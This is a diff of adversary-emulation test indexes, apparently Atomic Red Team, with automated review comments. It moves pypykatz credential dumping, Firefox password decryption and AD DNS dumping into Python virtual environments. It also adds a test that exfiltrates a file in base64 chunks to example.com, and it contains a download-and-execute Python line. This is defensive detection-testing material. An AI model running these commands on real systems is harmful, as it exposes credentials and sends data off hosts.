- get_prereq_command: 'pip install pypykatz + - description: "pypykatz must be installed \n" + prereq_command: 'if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction + SilentlyContinue) { exit 0 } else { exit 1 } ' - executor: - command: 'pypykatz live registry + get_prereq_command: '& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir + pypykatz 2>&1 | Out-Null ' + executor: + command: "\"#{venv_path}\\Scripts\\pypykatz\" live lsa \n" name: command_prompt elevation_required: true - name: esentutl.exe SAM copy @@ -85630,14 +85638,16 @@ credential-access: auto_generated_guid: dc9cd677-c70f-4df5-bd1c-f114af3c2381 description: "Firepwd.py is a script that can decrypt Mozilla (Thunderbird, Firefox) passwords.\nUpon successful execution, the decrypted credentials - will be output to a text file, as well as displayed on screen. \n" + will be output to a text file, as well as displayed on screen. \n\nWill create + a Python virtual environment within the External Payloads folder that can + be deleted manually post test execution.\n" supported_platforms: - windows input_arguments: Firepwd_Path: description: Filepath for Firepwd.py type: string - default: PathToAtomicsFolder\..\ExternalPayloads\Firepwd.py + default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1555.004\Scripts\Firepwd.py Out_Filepath: description: Filepath to output results to type: string 
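Review bot: The executor command for "Registry parse with pypykatz" now ends in `live lsa`, while the removed line ran `pypykatz live registry` and the name, description and `venv_t1003_002` default still describe registry hive parsing. As written the test would exercise LSA access rather than hive parsing, so a detection validated with it would be credited to the wrong behaviour; the line should read `command: "\"#{venv_path}\\Scripts\\pypykatz\" live registry \n"`. Separately, the new `get_prereq_command` downloads `python-3.10.4-amd64.exe` and installs it for all users without checking a digest; comparing `Get-FileHash` output with a pinned SHA-256 before `Start-Process` would be worth adding.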
@@ -85650,17 +85660,12 @@ credential-access: description: Filepath to python type: string default: C:\Program Files\Python310\python.exe + venv_path: + description: Path to the folder for the tactics venv + type: string + default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1555.004 dependency_executor_name: powershell dependencies: - - description: 'Firepwd must exist at #{Firepwd_Path} - - ' - prereq_command: 'if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1} - - ' - get_prereq_command: | - New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null - Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}" - description: 'Firefox profile directory must be present ' 
@@ -85696,36 +85701,52 @@ credential-access: New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait - - description: 'Pip must be installed. + - description: 'Computer must have venv configured at #{venv_path} + + ' + prereq_command: 'if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit + 1 } + + ' + get_prereq_command: 'py -m venv "#{venv_path}" + + ' + - description: 'Firepwd must exist at #{Firepwd_Path} + + ' + prereq_command: 'if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1} ' - prereq_command: | - $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")) - if (pip -v) {exit 0} else {exit 1} - get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" - -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://bootstrap.pypa.io/ez_setup.py\" - -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\" \ninvoke-webrequest - \"https://bootstrap.pypa.io/get-pip.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\ncmd - /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\n" - - description: "Pycryptodome library must be installed \n" - prereq_command: | - $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")) - if (pip show pycryptodome) {exit 0} else {exit 1} get_prereq_command: | 
- $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")) - if (test-path "#{VS_CMD_Path}"){pip install pycryptodome | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq"} + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null + Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}" + - description: "Pycryptodome library must be installed \n" + prereq_command: 'if (#{venv_path}\Scripts\pip.exe show pycryptodome) {exit + 0} else {exit 1} + + ' + get_prereq_command: 'if (test-path "#{VS_CMD_Path}"){#{venv_path}\Scripts\pip.exe + install pycryptodome | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | + out-null} else {write-host "Visual Studio Build Tools (C++ Support) must + be installed to continue gathering this prereq"} + + ' - description: "Pyasn1 library must be installed \n" - prereq_command: | - $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")) - if (pip show pyasn1) {exit 0} else {exit 1} - get_prereq_command: | - $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")) - if (test-path "#{VS_CMD_Path}"){pip install pyasn1 | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq."} + prereq_command: 'if (#{venv_path}\Scripts\pip.exe show pyasn1) {exit 0} else + {exit 1} + + ' + 
get_prereq_command: 'if (test-path "#{VS_CMD_Path}") & {#{venv_path}\Scripts\pip.exe + install pyasn1 | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} + else {write-host "Visual Studio Build Tools (C++ Support) must be installed + to continue gathering this prereq."} + + ' executor: name: powershell command: | $PasswordDBLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\" - cmd /c #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath} + cmd /c #{venv_path}\Scripts\python.exe #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath} cat #{Out_Filepath} cleanup_command: "Remove-Item -Path \"#{Out_Filepath}\" -erroraction silentlycontinue \ \n" 
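Review bot: The new pyasn1 `get_prereq_command` reads `if (test-path "#{VS_CMD_Path}") & {...} else {...}`, and PowerShell expects the statement block directly after the `if` condition, so the stray `&` should make this a parse error and the prerequisite would never install. The pycryptodome entry a few lines above has the intended shape; match it with `if (test-path "#{VS_CMD_Path}"){& "#{venv_path}\Scripts\pip.exe" install pyasn1 | out-null | ...`. The other new invocations in this hunk (`#{venv_path}\Scripts\pip.exe show ...` and `cmd /c #{venv_path}\Scripts\python.exe #{Firepwd_Path} ...`) leave the substituted paths unquoted, which breaks when the atomics folder path contains a space; the pypykatz tests in this file already use `& "#{venv_path}\Scripts\pip.exe"`. The test entry itself starts above this hunk.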
@@ -87023,42 +87044,50 @@ credential-access: Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test. Successful execution of this test will display multiple usernames and passwords/hashes to the screen. + + Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution. supported_platforms: - windows - dependency_executor_name: command_prompt + input_arguments: + venv_path: + description: Path to the folder for the tactics venv + type: string + default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1003_001 + dependency_executor_name: powershell dependencies: - description: 'Computer must have python 3 installed ' - prereq_command: | - py -3 --version >nul 2>&1 - exit /b %errorlevel% + prereq_command: 'if (Get-Command py -errorAction SilentlyContinue) { exit + 0 } else { exit 1 } + + ' get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait - - description: 'Computer must have pip installed + - description: 'Computer must have venv configured at #{venv_path} ' - prereq_command: | - py -3 -m pip --version >nul 2>&1 - exit /b %errorlevel% - get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" - -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://bootstrap.pypa.io/ez_setup.py\" - -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\" \ninvoke-webrequest - \"https://bootstrap.pypa.io/get-pip.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\ncmd - /c 
\"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\n" - - description: 'pypykatz must be installed and part of PATH + prereq_command: 'if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit + 1 } ' - prereq_command: | - pypykatz -h >nul 2>&1 - exit /b %errorlevel% - get_prereq_command: 'pip install pypykatz + get_prereq_command: 'py -m venv "#{venv_path}" + + ' + - description: "pypykatz must be installed \n" + prereq_command: 'if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction + SilentlyContinue) { exit 0 } else { exit 1 } + + ' + get_prereq_command: '& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir + pypykatz 2>&1 | Out-Null ' executor: - command: 'pypykatz live lsa + command: "\"#{venv_path}\\Scripts\\pypykatz\" live lsa \n" + cleanup_command: 'del "%temp%\nanodump.dmp" > nul 2> nul ' name: command_prompt 
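Review bot: The added `cleanup_command: 'del "%temp%\nanodump.dmp" > nul 2> nul'` at the end of this hunk deletes a file that nothing visible in this test creates, since the executor only runs `pypykatz live lsa`. It looks copied from another atomic, while the venv this test does create is left in place. The pypykatz prerequisite also installs an unpinned package and sends all pip output to `Out-Null`, so a failed install or an unexpected release goes unnoticed. Pinning it, e.g. `install --no-cache-dir pypykatz==<PINNED_VERSION>`, would keep runs reproducible. The same hunk recurs in windows-index.yaml and T1003.001.md; if these indexes are generated, the fix belongs in the atomic's source YAML.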
@@ -99594,40 +99623,47 @@ discovery: description: hostname or ip address to connect to. type: string default: 192.168.1.1 + venv_path: + description: Path to the folder for the tactics venv + type: string + default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1018 dependency_executor_name: powershell dependencies: - description: 'Computer must have python 3 installed ' - prereq_command: 'if (python --version) {exit 0} else {exit 1} + prereq_command: 'if (Get-Command py -errorAction SilentlyContinue) { exit + 0 } else { exit 1 } ' get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait - - description: 'Computer must have pip installed + - description: 'Computer must have venv configured at #{venv_path} ' - prereq_command: 'if (pip3 -V) {exit 0} else {exit 1} + prereq_command: 'if (Test-Path -Path "#{venv_path}" ) { exit 0 } else { exit + 1 } ' - get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" - -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://bootstrap.pypa.io/ez_setup.py\" - -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\" \ninvoke-webrequest - \"https://bootstrap.pypa.io/get-pip.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\ncmd - /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\n" - - description: 'adidnsdump must be installed and part of PATH + get_prereq_command: 'py -m venv "#{venv_path}" ' - prereq_command: 'if (cmd /c adidnsdump -h) {exit 0} else {exit 1} + - description: 'adidnsdump must be 
installed ' - get_prereq_command: 'pip3 install adidnsdump + prereq_command: 'if (Get-Command "#{venv_path}\Scripts\adidnsdump" -errorAction + SilentlyContinue) { exit 0 } else { exit 1 } + + ' + get_prereq_command: '& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir + adidnsdump 2>&1 | Out-Null ' executor: - command: 'adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name} + command: '"#{venv_path}\Scripts\adidnsdump" -u #{user_name} -p #{acct_pass} + --print-zones #{host_name} ' name: command_prompt @@ -100068,7 +100104,8 @@ discovery: - description: 'Check if python exists on the machine ' - prereq_command: 'if (python --version) {exit 0} else {exit 1} + prereq_command: 'if (Get-Command py -errorAction SilentlyContinue) { exit + 0 } else { exit 1 } ' get_prereq_command: | @@ -112282,6 +112319,38 @@ exfiltration: ' name: sh + - name: Network-Based Data Transfer in Small Chunks + auto_generated_guid: f0287b58-f4bc-40f6-87eb-692e126e7f8f + description: Simulate transferring data over a network in small chunks to evade + detection. + supported_platforms: + - windows + input_arguments: + source_file_path: + description: Path to the source file to transfer. + type: path + default: "[User specified]" + destination_url: + description: URL of the destination server. + type: url + default: http://example.com + chunk_size: + description: Size of each data chunk (in KB). + type: integer + default: 1024 + executor: + name: powershell + elevation_required: false + command: | + $file = [System.IO.File]::OpenRead(#{source_file_path}) + $chunkSize = #{chunk_size} * 1KB + $buffer = New-Object Byte[] $chunkSize + + while ($bytesRead = $file.Read($buffer, 0, $buffer.Length)) { + $encodedChunk = [Convert]::ToBase64String($buffer, 0, $bytesRead) + Invoke-WebRequest -Uri #{destination_url} -Method Post -Body $encodedChunk + } + $file.Close() T1537: technique: x_mitre_platforms: 
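Review bot: In the new T1030 test, `#{source_file_path}` and `#{destination_url}` are substituted into the PowerShell command unquoted, so `[System.IO.File]::OpenRead(#{source_file_path})` fails to parse unless the caller supplies the quotes. Quote both: `[System.IO.File]::OpenRead("#{source_file_path}")` and `-Uri "#{destination_url}"`. The default destination is a cleartext `http://` URL on a host the tester does not control, so a run against a real file would post its contents off the lab network; a default that points at a listener the tester owns, stated in the description, would be safer. `$file.Close()` is skipped if a request throws, so the handle should be released in a `finally` block. The same test is added in windows-index.yaml and T1030.md.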
diff --git a/atomics/Indexes/linux-index.yaml b/atomics/Indexes/linux-index.yaml index 4c4cfa6662..7bef70418a 100644 --- a/atomics/Indexes/linux-index.yaml +++ b/atomics/Indexes/linux-index.yaml @@ -30298,7 +30298,8 @@ execution: which_python=$(which python || which python3 || which python3.9 || which python2) $which_python -c 'import requests;import os;url = "#{script_url}";malicious_command = "#{executor} #{payload_file_name} #{script_args}";session = requests.session();source = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)' name: sh - cleanup_command: "rm #{payload_file_name} \n" + cleanup_command: "rm #{payload_file_name} \npip-autoremove pypykatz >nul 2> + nul\n" - name: Execute Python via scripts auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8 description: Create Python file (.py) that downloads and executes shell script diff --git a/atomics/Indexes/windows-index.yaml b/atomics/Indexes/windows-index.yaml index f662d099ab..636f33218f 100644 --- a/atomics/Indexes/windows-index.yaml +++ b/atomics/Indexes/windows-index.yaml 
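Review bot: The cleanup line added in the linux-index.yaml hunk, `pip-autoremove pypykatz >nul 2> nul`, runs under the `sh` executor, where `nul` is not a null device, so it creates a file named `nul` in the working directory. It also targets a package the visible test command never installs (that command only imports `requests`), which suggests it was pasted from a Windows pypykatz atomic. If the line is intended it should read `pip-autoremove pypykatz >/dev/null 2>&1`; otherwise drop it from this test. The same line appears in the T1059.006.md hunk.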
@@ -67908,44 +67908,51 @@ credential-access: elevation_required: true - name: Registry parse with pypykatz auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263 - description: 'Parses registry hives to obtain stored credentials + description: | + Parses registry hives to obtain stored credentials. - ' + Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution. supported_platforms: - windows - dependency_executor_name: command_prompt + input_arguments: + venv_path: + description: Path to the folder for the tactics venv + type: string + default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1003_002 + dependency_executor_name: powershell dependencies: - description: 'Computer must have python 3 installed ' - prereq_command: | - py -3 --version >nul 2>&1 - exit /b %errorlevel% - get_prereq_command: 'echo "Python 3 must be installed manually" + prereq_command: 'if (Get-Command py -errorAction SilentlyContinue) { exit + 0 } else { exit 1 } ' - - description: 'Computer must have pip installed + get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null + invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" + Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait + - description: 'Computer must have venv configured at #{venv_path} ' - prereq_command: | - py -3 -m pip --version >nul 2>&1 - exit /b %errorlevel% - get_prereq_command: 'echo "PIP must be installed manually" + prereq_command: 'if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit + 1 } ' - - description: 'pypykatz must be installed and part of PATH + get_prereq_command: 'py -m venv "#{venv_path}" ' - prereq_command: | - pypykatz -h >nul 2>&1 - exit /b %errorlevel% 
- get_prereq_command: 'pip install pypykatz + - description: "pypykatz must be installed \n" + prereq_command: 'if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction + SilentlyContinue) { exit 0 } else { exit 1 } ' - executor: - command: 'pypykatz live registry + get_prereq_command: '& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir + pypykatz 2>&1 | Out-Null ' + executor: + command: "\"#{venv_path}\\Scripts\\pypykatz\" live lsa \n" name: command_prompt elevation_required: true - name: esentutl.exe SAM copy @@ -70018,14 +70025,16 @@ credential-access: auto_generated_guid: dc9cd677-c70f-4df5-bd1c-f114af3c2381 description: "Firepwd.py is a script that can decrypt Mozilla (Thunderbird, Firefox) passwords.\nUpon successful execution, the decrypted credentials - will be output to a text file, as well as displayed on screen. \n" + will be output to a text file, as well as displayed on screen. \n\nWill create + a Python virtual environment within the External Payloads folder that can + be deleted manually post test execution.\n" supported_platforms: - windows input_arguments: Firepwd_Path: description: Filepath for Firepwd.py type: string - default: PathToAtomicsFolder\..\ExternalPayloads\Firepwd.py + default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1555.004\Scripts\Firepwd.py Out_Filepath: description: Filepath to output results to type: string 
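Review bot: The executor for "Registry parse with pypykatz" changes from `pypykatz live registry` to `"#{venv_path}\Scripts\pypykatz" live lsa`, which no longer matches the test name or its description ("Parses registry hives to obtain stored credentials"). Anyone validating registry-hive detections with this atomic would be exercising a different data source than the test claims, and the run would duplicate the LSA test that uses `venv_t1003_001`. Keep the subcommand: `command: "\"#{venv_path}\\Scripts\\pypykatz\" live registry \n"`. T1003.002.md carries the same change.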
@@ -70038,17 +70047,12 @@ credential-access: description: Filepath to python type: string default: C:\Program Files\Python310\python.exe + venv_path: + description: Path to the folder for the tactics venv + type: string + default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1555.004 dependency_executor_name: powershell dependencies: - - description: 'Firepwd must exist at #{Firepwd_Path} - - ' - prereq_command: 'if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1} - - ' - get_prereq_command: | - New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null - Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}" - description: 'Firefox profile directory must be present ' 
@@ -70084,36 +70088,52 @@ credential-access: New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait - - description: 'Pip must be installed. + - description: 'Computer must have venv configured at #{venv_path} + + ' + prereq_command: 'if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit + 1 } + + ' + get_prereq_command: 'py -m venv "#{venv_path}" + + ' + - description: 'Firepwd must exist at #{Firepwd_Path} + + ' + prereq_command: 'if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1} ' - prereq_command: | - $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")) - if (pip -v) {exit 0} else {exit 1} - get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" - -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://bootstrap.pypa.io/ez_setup.py\" - -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\" \ninvoke-webrequest - \"https://bootstrap.pypa.io/get-pip.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\ncmd - /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\n" - - description: "Pycryptodome library must be installed \n" - prereq_command: | - $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")) - if (pip show pycryptodome) {exit 0} else {exit 1} get_prereq_command: | 
- $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")) - if (test-path "#{VS_CMD_Path}"){pip install pycryptodome | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq"} + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null + Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}" + - description: "Pycryptodome library must be installed \n" + prereq_command: 'if (#{venv_path}\Scripts\pip.exe show pycryptodome) {exit + 0} else {exit 1} + + ' + get_prereq_command: 'if (test-path "#{VS_CMD_Path}"){#{venv_path}\Scripts\pip.exe + install pycryptodome | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | + out-null} else {write-host "Visual Studio Build Tools (C++ Support) must + be installed to continue gathering this prereq"} + + ' - description: "Pyasn1 library must be installed \n" - prereq_command: | - $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")) - if (pip show pyasn1) {exit 0} else {exit 1} - get_prereq_command: | - $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")) - if (test-path "#{VS_CMD_Path}"){pip install pyasn1 | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq."} + prereq_command: 'if (#{venv_path}\Scripts\pip.exe show pyasn1) {exit 0} else + {exit 1} + + ' + 
get_prereq_command: 'if (test-path "#{VS_CMD_Path}") & {#{venv_path}\Scripts\pip.exe + install pyasn1 | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} + else {write-host "Visual Studio Build Tools (C++ Support) must be installed + to continue gathering this prereq."} + + ' executor: name: powershell command: | $PasswordDBLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\" - cmd /c #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath} + cmd /c #{venv_path}\Scripts\python.exe #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath} cat #{Out_Filepath} cleanup_command: "Remove-Item -Path \"#{Out_Filepath}\" -erroraction silentlycontinue \ \n" 
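Review bot: The Pyasn1 `get_prereq_command` reads `if (test-path "#{VS_CMD_Path}") & {#{venv_path}\Scripts\pip.exe install pyasn1 ...}`; the `&` between the condition and the script block is not valid PowerShell `if` syntax, so this prerequisite cannot run. The Pycryptodome entry just above has no `&`, so the line should start `if (test-path "#{VS_CMD_Path}"){#{venv_path}\Scripts\pip.exe install pyasn1`. The venv paths are also unquoted here and in the executor (`cmd /c #{venv_path}\Scripts\python.exe #{Firepwd_Path} -d ...`), which breaks when the atomics folder path contains a space. The same text appears in the index.yaml hunk earlier on this page.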
@@ -71149,42 +71169,50 @@ credential-access: Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test. Successful execution of this test will display multiple usernames and passwords/hashes to the screen. + + Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution. supported_platforms: - windows - dependency_executor_name: command_prompt + input_arguments: + venv_path: + description: Path to the folder for the tactics venv + type: string + default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1003_001 + dependency_executor_name: powershell dependencies: - description: 'Computer must have python 3 installed ' - prereq_command: | - py -3 --version >nul 2>&1 - exit /b %errorlevel% + prereq_command: 'if (Get-Command py -errorAction SilentlyContinue) { exit + 0 } else { exit 1 } + + ' get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait - - description: 'Computer must have pip installed + - description: 'Computer must have venv configured at #{venv_path} ' - prereq_command: | - py -3 -m pip --version >nul 2>&1 - exit /b %errorlevel% - get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" - -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://bootstrap.pypa.io/ez_setup.py\" - -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\" \ninvoke-webrequest - \"https://bootstrap.pypa.io/get-pip.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\ncmd - /c 
\"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\n" - - description: 'pypykatz must be installed and part of PATH + prereq_command: 'if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit + 1 } ' - prereq_command: | - pypykatz -h >nul 2>&1 - exit /b %errorlevel% - get_prereq_command: 'pip install pypykatz + get_prereq_command: 'py -m venv "#{venv_path}" + + ' + - description: "pypykatz must be installed \n" + prereq_command: 'if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction + SilentlyContinue) { exit 0 } else { exit 1 } + + ' + get_prereq_command: '& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir + pypykatz 2>&1 | Out-Null ' executor: - command: 'pypykatz live lsa + command: "\"#{venv_path}\\Scripts\\pypykatz\" live lsa \n" + cleanup_command: 'del "%temp%\nanodump.dmp" > nul 2> nul ' name: command_prompt 
@@ -81068,40 +81096,47 @@ discovery: description: hostname or ip address to connect to. type: string default: 192.168.1.1 + venv_path: + description: Path to the folder for the tactics venv + type: string + default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1018 dependency_executor_name: powershell dependencies: - description: 'Computer must have python 3 installed ' - prereq_command: 'if (python --version) {exit 0} else {exit 1} + prereq_command: 'if (Get-Command py -errorAction SilentlyContinue) { exit + 0 } else { exit 1 } ' get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait - - description: 'Computer must have pip installed + - description: 'Computer must have venv configured at #{venv_path} ' - prereq_command: 'if (pip3 -V) {exit 0} else {exit 1} + prereq_command: 'if (Test-Path -Path "#{venv_path}" ) { exit 0 } else { exit + 1 } ' - get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" - -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest 